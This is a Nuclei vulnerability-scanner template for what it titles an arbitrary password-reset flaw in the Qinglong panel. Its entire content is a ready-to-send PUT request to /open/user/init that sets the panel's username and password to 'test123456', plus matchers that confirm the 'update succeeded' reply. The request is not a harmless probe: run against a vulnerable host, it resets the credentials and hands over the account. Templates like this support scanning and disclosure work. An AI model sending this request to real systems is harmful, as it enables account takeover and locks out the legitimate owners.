id: qinglong-init-reset-password

info:
  name: 青龙面板最新版存在任意重置密码漏洞
  author: qinglong
  severity: high
  tags: qinglong

http:
  - raw:
      - |
        PUT /open/user/init HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Content-Type: application/json

        {"username":"test123456","password":"test123456"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '更新成功'
          - 'message'
          - 'code'
        condition: and
